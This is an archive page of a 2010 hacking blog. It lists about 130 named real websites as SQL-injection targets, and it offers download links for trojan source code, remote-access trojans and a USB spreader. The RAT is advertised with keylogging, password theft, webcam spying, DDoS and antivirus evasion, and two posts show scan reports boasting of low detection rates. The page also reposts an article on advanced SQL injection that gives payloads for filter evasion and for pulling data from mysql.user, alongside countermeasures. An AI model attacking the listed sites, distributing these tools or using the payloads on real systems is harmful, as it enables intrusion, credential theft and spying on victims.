June 2010 | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

Some sqli vul Sites



Dnt forget to comments :)

South Africa:
http://www.asilialodges.com/index.php?id=6
http://booknow.biz/display.php?id=23338
http://www.booknow.biz/display.php?id=20866

Thailand:
http://www.luangta.com/thamma/thamma...?cgiBookID=218
http://www.kidsquare.com/content/index.php?catid=3
http://www.budpage.com/forum/view.php?id=271
http://www.pocketonline.net/board/view.php?id=13398
http://www.marmoon.com/pregames.php?id=2604
http://map.answerbox.net/sample.php?id=47


Sweden:
http://bugs.mysql.com/bug.php?id=13678
http://www.luftfartsskolen.no/liste.php?id=4
http://www.sadarvuga.com/php/project.php?id=59

Poland:
http://bip.mzdik.pl/index.php?id=54
http://www.edukacyjna.pl/ksiazka.php?id=4036
http://www.uzyjwyobrazni.pl/projekt.php?id=32
http://www.karat.org/index.php?pageId=244
http://www.companyservice.pl/news.php?id=15
http://www.tat.pl/informacja.php?id=836
http://bg-gallery.ru/autor_gallery.php?autor_id=45

Norway:
http://www.folkeuniversitetet.no/artikkel.php?id=5
http://www.koranen.no/artikkel.php?id=376
http://www.lykkensportal.no/visartikkel.php?id=791
http://www.lykkensportal.no/visartikkel.php?id=228
http://www.enforalle.net/index.php?pageid=92

NEtherlands:
http://www.merit.unu.edu/hfc/article.php?nid=3
http://www.aegee-academy.org/page.php?id=75
http://www.gigimo.com/main/calculate...st.php?id=6209
http://www.euphonium.net/download.php?id=18
http://www.josleys.com/show_gallery.php?galid=225
http://www.josleys.com/galleries.php?catid=8
http://www.tummiweb.com/escnation/sc...w.php?id=77356
http://www.sprezzatura.org/front_projecten.php?id=17

Japan:
http://ex.xlopp.net/pc/site_detail.php?id=1044
http://yamanakako.info/php/adclick.php?id=20
http://yamanakako.info/php/sisetsu.php?id=127
http://hills-okusama-dh.biz/pc/profile.php?id=17
http://www.mymits.net/rss/rss.php?id=free

Italy:
http://www.v-store.biz/firma-abbigliamento.php?id=1
http://www.sosia.biz/details-en.php?id=480
http://www.sosia.biz/details-it.php?id=804
http://www.sosia.biz/details-it.php?id=1184
http://www.joanfmira.info/general/calaix.php?id=96

Iceland:
http://malvis.hi.is/grein.php?id=215
http://fraedi.is/kvistur/grein.php?id=348
http://bin.arnastofnun.is/leit.php?id=5706
http://www.physio.is/greinalisti.php?id_teg=2
http://www.physio.is/grein.php?id_grein=26

Ireland:
http://sports.yourspace.nuigalway.ie....php?page_id=2
http://www.ccnarchitects.net/index.php?pageID=47
http://www.rebeladventures.com/index.php?pageID=53
http://www.mergon.com/index.php?pageID=11
http://www.conorharrington.com/index.php?pageID=3
http://www.westcorkartscentre.com/index.php?pageID=16
http://www.fitzpatricksgarages.ie/detail.php?ID=1053
http://www.dlctc.ie/courses.php?id=1
http://www.carrickonshannon.ie/carri...s.php?member=6
http://www.kellihers.ie/vehicledetail.php?id=823
http://www.killarney.ie/shop.php?id=8

France:
http://screening.iarc.fr/biosketch.php?Id=26
http://toptube.free.fr/video.php?id=2265
http://complexnetworks.fr/plots.php?plot_id=49
http://www.lewub.com/guide.php?catid=5
http://www.snitem.fr/index.php?glang=EN
http://www.jphevin.com/content.php?id_article=13
http://mangallery.pl/imitacja/komentarze.php?id=0
http://se-center.pl/articles.php?id=25
http://revue-ligeia.com/contenu.php?id=19
http://www.netref.net/en-solutions/f...oduct.php?id=2
http://www.adirectory.net/adresse.php?id=43
http://www.adirectory.net/adresse.php?id=108
http://www.simophone.biz/link/showlink.php?link=1319

Finland:
http://www.helsinki.fi/atk/ajankohta...inen.php?id=49
http://www.noise.fi/levyarvostelut/index.php?id=1669
http://www.muonio.fi/web/index.php?id=153
http://www.pello.fi/web/index.php?id=289
http://www.kemishipping.fi/web/index.php?id=3
http://www.lynxvalley.fi/web/index.php?id=3
http://www.lynxvalley.fi/web/index.php?id=482
http://www.enontekio.fi/web/index.php?id=3
http://papunet.net/yleis/toimintaohj...ex.php?ohje=19
http://www.vtb.no/vis.php?id=3699
http://www.vtb.no/visartikkel.php?id=3613

Denmak:
http://www.gratisvideo.dk/counter.php?id=98
http://www.gratis-ting.dk/ny/spilfil...ik.php?id=2423
http://www.gourmethaven.dk/artikel/vis.php?id=126
http://gourmethaven.dk/links/hop.php?id=29
http://www.musikcafeen.dk/event.php?id=923
http://www.runi.dk/index.php?ID=7
http://spil.pift.dk/redirect.php?ID=276

GErmany:
http://fmdanmark.dk/downloads/show_download.php?id=65
http://www.heatsink.biz/board/read.php?id=1169
http://www.heatsink.biz/board/read.php?id=1243
http://heatsink.biz/board/read.php?id=1020
http://www.heatsink.biz/board/read.php?id=1208
http://www.repower-uk.co.uk/index.php?id=237
http://www.springersbm.com/index.php?id=291
http://www.pressbot.net/file_tracking.php?id=278
http://www.foreign-affairs.info/volltext.php?id=94
http://www.cluster-maritime.fr/article.php?id=53
http://www.noborder.org/iom/display.php?id=244
http://noborder.org/iom/display.php?id=244
http://free-gambling-directory.info/...goto.php?id=93
http://www.musiquemachine.com/review...te.php?id=1131
http://www.demonews.de/kurznachricht...hortnews=14548
http://www.anna-schmidt-schule.info/...php?pageid=226
http://creative-impressions.biz/cata...ogue.php?id=12
http://ordo-journal.com/en/content.php?id=7

canade China CZ spain:
http://www.thestudentroom.co.uk/show....php?t=1065165
http://www.supersoda.com/detail.php?id=00000000109
http://www.meister-eng.biz/cpinfo.php?id=3
http://nandaihe.net.cn/hoteldetail.php?id=171
http://www.beidaihe.biz/hoteldetail.php?id=354
http://www.avian-flu.info/news/show.php?did=1464
http://www.kingnet.biz/product/pro_show.php?id=20
http://www.medtel.cz/ps/section_view.php?r=81


Read More Add your Comment 5 comments


23 Source Code of Trojans




[VB]bLACKdREAM
[VB]derSphear
[VB]Evoloution
[VB]Monk1.0
[VB]Omega1.1
[Vb]Sect
[Vb]SennaspyAutoTrojan
[VB]stealth eye
[VB]simplu
[VB]Remote_Admin
[VB]pzza cod
[VB]pasword crack
[VB]Organising182384112001
[VB]minimo
[VB]Messiah 2.0 [Private]
[VB]Handle-X
[VB]FearRAT
[VB]Controla Machine
[VB]CommandCenter
[VB]ClientServerciccio
[VB]Black Dream
[VB]Basic Trojan Horse
[VB]Ullysse


download :
http://www.megaupload.com/?d=7VS8B7C9


Read More Add your Comment 1 comments


Advanced SQL Injection Techniques



SQL Injection attacks target the core of a web application: its database. Their most significant impact enables an attacker to retrieve, modify, or delete arbitrary data. It is a serious threat to any application with a database back-end and a threat that should be fully understood in order to develop adequate countermeasures.
Every web server administrator must acknowledge techniques that can be used to identify an SQL Injection vulnerability (see Tobias Glemser's Article SQL Injection Attacks with PHP and MySQL, hakin9 03/2005) and assess the scope of its risk. The basic methodology for an SQL Injection attack is to identify a potential vector, then exploit that vector with customized SQL queries - all through the web browser.
Identification of the potential for a vulnerability is important, but even more important is the ability to evaluate its impact. In some cases, a SQL Injection vector may offer nothing more than the capability to generate some syntax errors, such as trying to convert strings to numeric values. In other cases, the vector may enable the attacker to fully compromise a database's information. Although the examples refer to MySQL databases, the techniques apply to any database platform and, in most cases, can be applied without modification. The core of these techniques targets the SQL language. Certain database extensions merely make these techniques easier to accomplish.
To refresh the memory

SQL Injection tests can be classified into three categories based on which aspect of the query is targeted:
  • attack the syntax of the query - insert common SQL characters with the intention of generating errors to identify potential attack vectors,
  • attack the syntax of the language - target the SQL language itself in order to generate database errors or perform simple queries by manipulating language constructs and semantic identities,
  • attack the logic of the query - rewrite the query to retrieve arbitrary data from tables to which developers did not intend access.
These techniques can be combined to assess a web application and determine its vulnerability to SQL Injection attacks. In the next sections the SQL Injection payloads are presented without the entire URL as an example. This makes it easier to understand the techniques without cumbersome parameters and text.
This is also because the injection of these payloads is quite simple. Given a URL of the form http://site/page.cgi?a=foo&b=bar, a SQL Injection attack replaces the vulnerable parameter's value with its payload: http://site/page.cgi?a=&b=bar. As a further reminder, one has to remember to encode spaces and other characters in the payload so that they do not disrupt the syntax of the URL.
Attack the syntax of the query


The single quote, while arguably the most popular character for identifying SQL Injection vectors, is by no means the only character necessary to generate a database error. This technique encompasses most fundamental tests for potential vulnerabilities by using SQL language metacharacters or formatting characters to disrupt the syntax of the original query. For example, the following statements cannot be parsed into valid queries because they have an ill-formed syntax due to an unterminated single quote:

  • SELECT foo FROM bar WHERE a = ''';,
  • SELECT foo FROM bar WHERE a = '/*;,
  • SELECT foo FROM bar WHERE a = ';--;,
  • SELECT foo FROM bar WHERE a = '#;.
While the most common example is the single quote character (ASCII 0x27), many characters can be used to disrupt the syntax including:
  • unmatched parenthesis,
  • semi-colon,
  • comment delimiter - /*, #, or --.
Validation filters that only prohibit single quote characters (or some small set of characters) might prevent full exploitation of a vulnerability, but such filters are often inadequate. They may simply obscure more fundamental problems with the application's database connection architecture.
Quotes vs. slashes


PHP developers face several challenges and potentially confusing recommendations when creating strong input validation filters. PHP's magic_quotes() function automatically escapes all single quotes with a backslash character; however, if this feature is combined with a call to the strip_slashes() function, then the escape characters have been removed:

  • SELECT foo FROM bar WHERE a = '\''; - single quote escaped,
  • SELECT foo FROM bar WHERE a = '''; - backslash stripped, query ill-formed.
The other danger of focusing on the single quote character is that developers may not be aware of the full range of characters and techniques available to an attacker for exploiting a SQL query. The attacker can combine SQL functions to generate errors in the syntax of a query.
You can also use inherent SQL functions to generate errors. The SQL
CHAR() function prints the ASCII equivalent of the argument. An attacker may be able to inject quote characters by using odd or even amounts of CHAR(0x27) strings (hexadecimal 0x27 represents the ASCII code for the single quote). This is important, because the attack consists of alphanumeric characters plus the parentheses. Consequently, monitoring input for quote characters will not catch or block the attack.
Variables may vary


Database-related errors can also be generated by attacking variable types. This is most effective against numeric values, but is also successful against date or time variables. For example, here is a list of different values that you may try against parameters that expect decimal numbers:

  • 8-, 16-, 32- and 64-bit values - 256, 65536, etc.,
  • integer overflows - 2^8 + 1, 2^16 +1, 2^32 + 1, or 2^64 + 1,
  • unsigned vs. signed values - inserting negative values,
  • floating-point overflows - for example 3.40282346638528860e+38, 1.79769313486231570e+308,
  • alternate presentation - binary, octal, hexadecimal, or scientific notation.
These numeric attacks often succeed in generating errors because the variables used to track these values are not strongly typed. In PHP the parameter type of all $_REQUEST variables is a string. This means that, although you can perform arithmetic operations on variables ($a = 1; $a++), the actual type of the variable may be considered a numeric string. The variable may even be silently promoted from a number to a numeric string when the value would normally result in an overflow, inf (infinity), or NaN (not a number) equivalent. For example, PHP's is_numeric("1e308") function returns true (it is a number), but is_numeric("1e309") returns false - neither a number or numeric string because it is beyond the double float type that PHP supports. A variable must be set to numeric explicitly using the settype()inf - which can also lead to errors in the query if it is expecting numerals.
function, but beware that large values may return a value of Fighting the synonyms

Robust input validation filters can be an effective countermeasures to these techniques, but they are not sufficient. Database errors and other exceptions should be trapped and prevented from being sent to the browser. Verbose error information tends to provide useful information for malicious users targeting a database. As we will see a bit later, input validation filters may be inadequate. For example, we have already seen that the value 1e309 is not a number (for most languages and SQL databases) and will generate an error in less secure applications. Yet 1e309 does not contain any characters that are normally malicious. It is a purely alphanumeric value.

Note that SQL is a rich language that provides an attacker to create many synonomous permutations. For example,
CHAR(0x27) is equivalent to ASCII(0x27) which can also be written as x'27. We focus on using the CHAR(0x27) string to avoid raw quotes in the payload, but the specifics of each test are highly mutable. This also implies that syntax-based filtering - such as application-layer firewalls - must be very robust in order to prevent these attacks. In fact, the combination of alternate encoding schemes (URL encoding, Unicode) and creative SQL will bypass most pattern-matching filters. Remember, CHAR(0x27) is the same as cH%41r(0x68-0x41).
Semantic doppelgangers - attack the syntax of the language


In SQL, Shakespeare's observation of roses might look like the decidedly unpoetic:

SELECT name FROM roses
WHERE scent='sweet';
Whether a rose might be called shoe, bumblebee, or clock, its sweet-smelling attribute remains unchanged. SQL provides a rich set of functions that can be used to create semanticly equivalent queries that look quite different textually. This capability enables an attacker to identify and exploit injection vulnerabilities even when the server does not reveal error information or similar output.
While it is useful to break queries in order to find potential vulnerabilities, it is also profitable to attack the query using the semantics of built-in SQL functions. Thus, instead of attacking the parser of the application language (PHP, JSP, etc.), the attack focuses on the SQL language itself. This has the added benefit of not only identifying attack vectors, but also provides more information about the input validation filters used by the application. Another byproduct of this technique is the ability to perform blind SQL Injection attacks, or attacks that do not rely on error generation in order to identify or exploit.
Numeric data types


Numeric data types are the easiest candidates to test with this technique. Figure 1 shows the original example URL, while Figures 2 and 3 present modified addresses We are using an older, insecure version of FreznoShop online shopping system - releases newer than 1.4 branch are quite invulnerable.

Consider the following list of name/value pairs:
  • rowid = 111,
  • rowid = 0x6f,
  • rowid = 0157 (octal representation),
  • rowid = 110+1 (use 110%2b1 in practice because the + stands for a space character in the URL),
  • rowid = 112-1,
  • rowid = MOD(111,112),
  • rowid = REPEAT(1,3),
  • rowid = COALESCE(NULL,NULL,111)
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Figure 1. The original example URL



DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Figure 2. Modified URL string


DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
Figure 3. The same string modified with usage of MOD() function


From a database's point of view, each one of these requests results in the same value: 111. Also notice that none of these rely on the single quote character. The first three look like numeric or alphanumeric strings, the next two have apparently innocuous characters for the addition and subtraction symbols, and the final three include parentheses and a comma. If input validation were to focus on stripping the single quote, then a vulnerable application would gain no benefit from such a countermeasure.

Raw parameters


This technique, which uses semantic doppelgangers, enables the user to identify SQL Injection vectors. If the result of each request is identical, then it can be assumed that the application engine has parsed the raw parameter value and inserted it into the underlying SQL query. For example, consider this query for a rowid:

SELECT foo FROM table
WHERE rowid = 110+1;
The database calculates 110+1 = 111 before resolving the rest of the query, according to its order of operations. This bears the same result as the original query:
SELECT foo FROM table
WHERE rowid = 111;
Before we explain how to extend this attack to extract arbitrary data, let us first examine some other cases that can be used for error generation. Even though this technique does not require us to generate database errors, such information is useful to determine versions and names of tables or columns. If the application's input validation filters have stripped quote characters, but not trapped database errors, then we can target incorrect SQL function syntax. For example:
  • BIN(-1),
  • LIMIT a (this is useful because it does not require parentheses),
  • MOD(0,a).
Of course, numeric values should also be tested for boundary conditions as mentioned in the previous section.
Premature termination characters


This technique lends itself to the creation of custom SQL queries. Such queries often do not require quote characters, but often require premature termination characters. Thus, a request might employ
/* or -- in order to truncate additional, undesired statements. A string SELECT foo FROM table WHERE rowid = MOD(111,112)+UNION+SELECT +USER()/*;
String values present a greater challenge because there are fewer functions in the SQL language that provide helpful semantic doppelgangers. The
is a good example. CONCAT() function is useful for these cases. In cases where the string argument only contains the letters a-f , the HEX() function can be used:
  • op=add,
  • op=HEX(2781),
  • op=REVERSE(dda),
  • LEAST(0x6d75736963,0x6e75 736963),
  • GREATEST(0x61,0x6d7573696 3).
Once again, we have consciously chosen to avoid using quote characters because they set off alarms or may be blocked. Yet this doesn't prevent us from creating complex strings. The REVERSE(), LEAST(), and GREATEST() functions only need parentheses and commas. The following examples are all semantically identical:
  • page.cgi?category=music,
  • page.cgi?category=REVERSE (cisum),
  • page.cgi?category=GREATES T(0x61,0x6d75736963),
  • page.cgi?category=LEAST(0 x6d75736963,0x6e75736963) .

Countermeasures


The best countermeasures for these attacks use input validation filters and strong data types when assigning user-supplied values to query parameters. Even though 0x27 is a valid hexadecimal value, it should be prohibited by the application because the raw value contains a non-numeric character (or possibly silently coaxed into 27 decimal). Likewise, octal 0157 should either be denied because of the leading zero, or the leading zero could be stripped so the value becomes 157 decimal, which is merely a different row number. At the very least, developers should be aware of alternate bases and understand where they are interpreted: either in the application language or in the database.

It's very easy to handle all user-supplied data as strings, but if the data are to be inserted into a query, then they should be explicitly assigned (cast) to the appropriate data type. For interpreted languages such as PHP, Perl, C#, or Visual Basic the assignment should be safe or generate a conversion error. If the web application uses a compiled language such as C or C++, then the type casting should be handled carefully and checked for exceptions (think of format-string attacks).
Attack the logic of the query


Breaking the syntax of a query is useful for identifying SQL Injection vulnerabilities, but it only demonstrates the existence of a problem. Arbitrary data access is the true risk associated with SQL Injection attacks.

MySQL supports a specific comment macro that triggers on the database version /*! */, where is a 5-digit value that represents the MySQL build. For example, version 3.23.02 looks like 32302, version 4.1.10 looks like 40110, and version 5.0.3 looks like 50003. The most immediate way to test for embedded SQL attacks with MySQL is to combine the comment extension with a statement that ensures the query will fail:
  • /*!32302+AND+0+*/,
  • /*!32302+AND+0+*//* (it may be necessary to terminate the query).
Then, one can flip the query and ensure that it succeeds in order to verify the injection vector - /*!32302+AND+1+*//* (it may be necessary to terminate the query).
UNION SELECT


Once a parameter has been identified as a vector for SQL Injection attacks, the next step is to determine the amount to which the database is exposed. This is accomplished by manipulating the logic of the original query. Most basic queries are of the form
SELECT foo FROM bar WHERE a=b; in which the b of a=b clause is the parameter that can be manipulated. Consequently, the new query must consider the previous SELECT. The quickest technique is to use the UNION keyword.
The
UNION statement combines multiple SELECT statements and is supported by most databases. The basic form looks like SELECT foo FROM bar WHERE a=b UNION SELECT foo2 FROM bar2 WHERE c=d;.
One useful
UNION clause is to display the user name under which the database connection has been established. On MySQL you would do this with SELECT USER(). Inside a UNION clause the request might look like
SELECT text FROM articles
WHERE id=0
UNION SELECT USER();
Several challenges present themselves when using
UNION statements for SQL Injection attacks:
  • the UNION clause should terminate the query to ensure valid syntax - any additional logic must be truncated,
  • UNION statements require matching column counts in each SELECT clause.
The first challenge is relatively easy to accomplish. Simply use one of the common terminators described in the previous section. This can be a comment delimiter (#, /*, --) in combination - if necessary - with a semicolon or single quote.
Columns and bears


The second challenge is not difficult to overcome, but requires a few iterative steps remniscent of Goldilocks and the three bears. The injected
UNION clause will either have too few columns or too many of them - what you need is a number that is just right! If you can observe the database's error messages, then you'll see something like The used SELECT statements have a different number of columns.
Column undercounts can be fixed by adding extra columns or column place-holders to the
SELECT statement (see Figure 4). For example, consider the following statements:
  • SELECT user FROM mysql.user,
  • SELECT 1,user FROM mysql.user,
  • SELECT 1,1,user FROM mysql.user,
  • SELECT user,user,user,user FROM mysql.user.
DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Figure 4. A successful UNION SELECT attack


Each one of these queries is designed to grab the user name (or names) from the default
mysql.user table. The number of columns increases from one to four in each example. In practice, it is better to repeat the column name to ensure that the value is displayed in the application. The first placeholder works, but it's hard to tell which column the web application will display.
Column overcounts can be addressed by using the CONCAT statement. Overcounts occur when the first SELECT statement expects fewer columns than your custom query. The CONCAT statement resolves this by concatenating each column into a single string. Thus, multiple columns are reduced to a single column. For example:
SELECT foo FROM table
WHERE a=b
UNION SELECT CONCAT(*)
FROM mysql.user;
This can be combined with the undercount technique when necessary:
SELECT foo,bar FROM table
WHERE a=b
UNION SELECT 1,CONCAT(*)
FROM mysql.user;
The major caveat is that any NULL value in one of the column results will cast the
CONCAT string to NULL.
Aim at rows


Once you have matched column counts for the query, the next step is often to specify an arbitrary row to retrieve from a table. When the query returns multiple rows, often only the first one is displayed. To some degree, a good
WHERE clause can help target specific rows, but only if the table's general structure (column names) is known before-hand. A much easier method uses offsets within the LIMIT clause. You can limit the result to one row by using LIMIT 1, but you can control which row is returned by adding the optional offset beginning with 0. For example:
  • SELECT foo FROM table WHERE a=b UNION (SELECT CONCAT(*) FROM mysql.user LIMIT 0,1);,
  • SELECT foo FROM table WHERE a=b UNION (SELECT CONCAT(*) FROM mysql.user LIMIT 1,1);,
  • SELECT foo FROM table WHERE a=b UNION (SELECT CONCAT(*) FROM mysql.user LIMIT 2,1);.
You can progress through the offsets until the query returns a NULL row. Unlike the previous examples of simple queries, it is necessary to place parentheses around the clause that contains the LIMIT statement. Otherwise it will be incorrectly applied to the entire query.
Defence by statements


The use of prepared statements (also known as parameterized queries) or stored procedures are effective countermeasures to these techniques because they separate the logic of the query from the data of the query. Consequently, injection attacks can corrupt the original SQL query, but will not be able to rewrite it in such a manner that arbitrary tables or data can be accessed.

A potential drawback of prepared statements is that they require additional set-up within the application. This could lead to a performance degradation; however, such an impact may be minimal. The security gains are definitely good.
Help yourself and separate


Inadequate input validation filters are an integral part of SQL Injection countermeasures, but they are often not the underlying problem. Strong data typing (assigning numbers to numeric data types, etc.) is also key, but string data always presents a challenge (see Frame
Additional SQL tricks).
Additional SQL tricks


Our core idea is to identify a SQL Injection vulnerability via creative use of SQL formatting characters (syntax) or SQL functions (semantics), then exploit the vulnerability by attacking the SQL logic. Although it primarily focuses on numeric and string manipulation, other functions can be used (or rather misused) to generate errors for vulnerability identification:

  • INET_ATON(),
  • INET_NTOA(),
  • SOUNDEX().
Enumeration is another important part of SQL Injection; one that is beyond our scope here. Nevertheless, here are some simple queries that can be used to further determine information about a database:
  • SHOW VARIABLES,
  • SHOW STATUS,
  • SHOW DATABASES,
  • SHOW TABLES,
  • DESCRIBE
  • EXPLAIN
    ,
  • EXPLAIN SELECT FROM
    ,
  • SHOW FULL COLUMNS FROM
    ,
  • SELECT USER(),
  • SELECT SESSION_USER(),
  • SELECT CURRENT_USER(),
  • SELECT SYSTEM_USER(),
  • SELECT SUBSTRING_INDEX(USER(),'@ ',1),
  • SHOW CHARACTER SET,
  • SELECT CURDATE(),
  • SELECT CURTIME().
    A more fundamental problem of SQL Injection is the lack of separation between the query's logic and data. The logic is defined by the developer and is expected to remain static. The data are collected from the user. When the data and logic intermingle, such as using string concatenation to build queries, then user-supplied data can manipulate the logic of the query. This is the higher risk compared to input validation, because a modified query provides access to arbitrary data in the database. A formatting character maliciously inserted into a stored procedure may merely produce a database error instead of exposing the actual data. This is not meant to imply that input validation is not important; however, any countermeasure to these types of attacks should focus equally on query construction and execution.
    Without a comprehensive understanding of the different techniques that attackers employ against web applications, developers will not create effective countermeasures. From an assessment perspective, auditors who do not adequately investigate the scope of a SQL Injection vulnerability present an inaccurate view of the application's risk - and if testing only relies on injecting single quote characters, then the assessment may be useless. SQL Injection attacks can be executed with many different characters.



Read More Add your Comment 4 comments


+160 Hacking Videos.



+160 Hacking Videos..
Lang:Spanish

How to Set Forums + Localhost web
How to hack Forums (5 differnets)
How to steal mail from webs (with users pw)
How to hack Webs
Very Easy Search after Database
How to hack hotmail, yahoo, AIM
how to use Programs (Hacking tools)

and much more..



Download
http://www.megaupload.com/se/?d=9UQ5HIVR
Password:

Whitemach


Read More Add your Comment 0 comments


Send Sms For Free, Huge List Of Sites Only For Fsd Members




https://zyb.com/

http://www.mobyko.com/

http://stepsms.com/

http://www.smstxtbox.com/web/

http://www.junglesms.com/

http://50sms.com/

http://www.ecosms.ch/

http://www.free--sms.com/index.go

http://www.pimpmysms.com/

http://www.islamweb.net/

http://www.phones.com/

http://www.devinosms.com/

http://gsms.se/

http://www.themobiweb.com/en/sms.html

http://my.phonegnome.com/

http://sms4u.biz/signup.php

http://simsor.com/register

http://www.mobik.com/mobik/client/

http://www.smsdiscount.com/en/index.html

http://4usms.net/

http://www.sendsmsnow.com/

http://www.unisms.uni.cc/

http://www.atrochatro.com/

http://www.gsmvault.com/

http://smscity.com/

http://www.sms2india.org/

http://www.freesms.web.tr.tc/

http://www.d1g.com/

http://thesmszone.com/

http://zyb.com/

http://www.vazu.com/

http://www.sms.ac/

http://www.agentsms.com/

http://www.mobizone.com/


http://www.yellowpages.com.eg/

http://www.boswtol.com/

www.masrawy.com/sms

http://www.resalh.com/

http://free-sms-message.com/index.htm

http://adleel.com/sms.htm

http://mobile.fares.net/sms/uae

http://www.itsalat.com/

http://www.quios.com/

http://www.clickatell.com/

www.ulluminati.ch/Nexus/sms.html

http://www.freesms.net/

http://www.free-sms.com/

http://www.lycos.co.uk/

http://www.sms.at/

http://www.sms.com/

http://www.smsyes.com/

www.smsuae.com/sms-uae

http://www.edihasms.com/

http://www.shortmessage.com/

www.worldxs.net/sms.html

www.hot.it/sms

http://www.smspress.com/

http://www.freesms.com/

http://www.textmefree.com/

http://www.rosms.home.ro/

http://www.nice-prizes.de/

http://www.uni.de/

http://www.quicksms.de/

http://www.cbfsms.com/

http://www.sms.de/

www.send.sms.to/free.asp

http://www.genie.co.uk/

www.world-free.com/free-sms

www.aircall.ch/sms/sendmsg_main_free.asp

www.telefonmarkt.de/sms/sms_info.php

http://www.free-sms-service.de/

http://www.freesms.2way.de/

www.bestspider.com/sms

http://www.metacrawler.de/

www.jokes.gr/en/sms

www.call-magazine.de/free_sms

http://www.vizzavi.it/

www.uboot.com/uk

www.ournet.md/sms

http://www.cellular.co.za/download_...ms_software.htm

http://www.freesms.co.za/

http://www.hotsms.com/

http://www.jfax.de/

http://www.smsfree.co.uk/

www.mobileedge.co.uk/freesms/freesms.htm

http://www.sms-sprueche.tv/

http://www.sms.mums.it/

http://www.smspup.com/

www.jump.to/freesms

http://www.awalsms.com/

http://www.uaesms.com/

www.jinny.com.lb/sms

www.cellular.co.za/send_sms2.htm

http://www.mobizone.com/

http://www.smspop.com/

http://www.nemra1.com/

http://www.boswtol.com/

http://free-sms-message.com/index.htm

http://adleel.com/sms.htm

http://www.itsalat.com/

http://www.quios.com/

http://www.clickatell.com/

www.ulluminati.ch/Nexus/sms.html

http://www.freesms.net/

http://www.free-sms.com/

http://www.lycos.co.uk/

http://www.sms.at/

http://www.smsyes.com/

www.smsuae.com/sms-uae

http://www.edihasms.com/

www.worldxs.net/sms.html

www.hot.it/sms

http://www.smspress.com/

http://www.freesms.com/

http://www.textmefree.com/

http://www.rosms.home.ro/

http://www.nice-prizes.de/

http://www.uni.de/

http://www.quicksms.de/

http://www.cbfsms.com/

http://www.sms.de/

www.send.sms.to/free.asp

http://www.genie.co.uk/

www.world-free.com/free-sms

www.aircall.ch/sms/sendmsg_main_free.asp

www.telefonmarkt.de/sms/sms_info.php


www.bestspider.com/sms

www.jokes.gr/en/sms

www.call-magazine.de/free_sms

http://www.vizzavi.it/

www.uboot.com/uk

www.ournet.md/sms

http://www.cellular.co.za/download_f...s_software.htm


http://www.freesms.co.za/

http://www.hotsms.com/

http://www.jfax.de/

http://www.smsfree.co.uk/

www.mobileedge.co.uk/freesms/freesms.htm

http://www.sms-sprueche.tv/

http://www.sms.mums.it/

http://www.smspup.com/

www.jump.to/freesms


Read More Add your Comment 0 comments


Albertino Advanced RATFeatures[*]Reverse Connection Connect Behind Routers [*]UPnP Ru



Features[*]Reverse Connection
Connect Behind Routers[*]UPnP
Run RAT without port forwarding (on most routers)[*]Multi-Clients Management
Control few clients simultaneously[*]Remote Client Information
Basic client info[*]Last 25 visited web pages[*]Send Fake Messages[*]Funny Stuff
(Hide Desktop Icons, Hide Start Button, Hide Task Bar, Open-Close CD-Rom, Flip Screen, Swap Mouse buttons, Lock CTRL+ALT+DEL, Shut monitor off, Run Screensaver)[*]IE Options
Get Version, Change Home Page, Change IE Title, Open Website.[*]Control Panel
Shutdown PC, Restart PC, Logoff User[*]Clipboard Manager
Get Clipboard, Set Clipboard, Clear Clipboard.[*]Remote Server Download
Download files and execute them.[*]Printer Manager
Print to Default Printer[*]File Manager
Download and Upload Locally, Execute, Delete File, Delete Folder, Make Folder, Rename, File Size[*]Search Files
Search for any file or type on remote PC.[*]Keylogger
Get all keystrokes from remote PC.[*]Remote Passwords
FF 2,3 and 3.5+, IE7-8, Chrome, MSN (+Live Messenger), Trillian, IMVU, Pidgin, No-IP, DyDNS, FileZilla, Outlook (no drops or external references)[*]Processes Manager
List all running processes with the ability to close selected.[*]Services Manager
List all services, Stop-Start Service, Disable-Manual-Autostart Service.[*]Windows Manager
Control Opened Windows (Close, Hide, Minimize, Maximize, Restore, Default, No Active)[*]Remote Desktop
Watch Live Remote Desktop with ability to change Image Quality and resolution, Remote Control, Save capture video to file XVID, DIVX and many others)[*]Remote WebCam
Watch Live Remote WebCam (Save capture as video to file as XVID, DIVX and others)[*]Registry Editor
List, Create, Edit, Delete registry keys[*]Send to All
Download and run file from website to all clients, Upload and run file from your PC to all clients, Run a DDOS (small bot)[*]Command Prompt Line
Manage remote cmd as your own.[*]Client Geo Location[*]Anti-Debug
Antis like Norman, Panda, Anubis, Sunbelt, JoeBox, Sandbox, Sanboxie, WireShark, SysAnalyzer, Threat Expert.[*]Built-in Binder.
New technology method[*]Icon Changer[*]Assembly Editor[*]Stub Size is various from 140kb to 160kb depends on encryption key.

Download:

Code:
http://www.mediafire.com/?mjgdonjtrdy


Read More Add your Comment 1 comments


{Rat} Prog arc tool for hacking



 

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



Quote:
File Info

Report date: 2010-05-01 01:06:29 (GMT 1)
File name: server.exe
File size: 173056 bytes
MD5 Hash: 02b1debf5790daeb1d9068cfc b776f03
SHA1 Hash: 5aaa06b4296a62e4b27ef19f5 cfed26c1f6a5500
Detection rate: 2 on 20 (10%)
Status: INFECTED

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - TR/Agent.173056
BitDefender - -
ClamAV - -
Comodo - -
Dr.************ - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - MSIL/PSW.Agent.NAP
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org
download :
Quote:
http://www.mediafire.com/?cyzyotmytyd


Read More Add your Comment 1 comments


Healing Ivy - USB Spreader MOD by Harker




DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm
-(* Virus scan *)-

Code:
STUB
File Info
Report date: 2010-06-16 15:52:24 (GMT 1)
File name: Stub.his
File size: 377856 bytes
MD5 Hash: 9485dda27571a336337795e0eb0a1024
SHA1 Hash: 9e8ef3b45cb9baef9d8c3ea44a0261610731fee5
Detection rate: 0 on 17 (0%)
Status: CLEAN

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
NOD32 - -
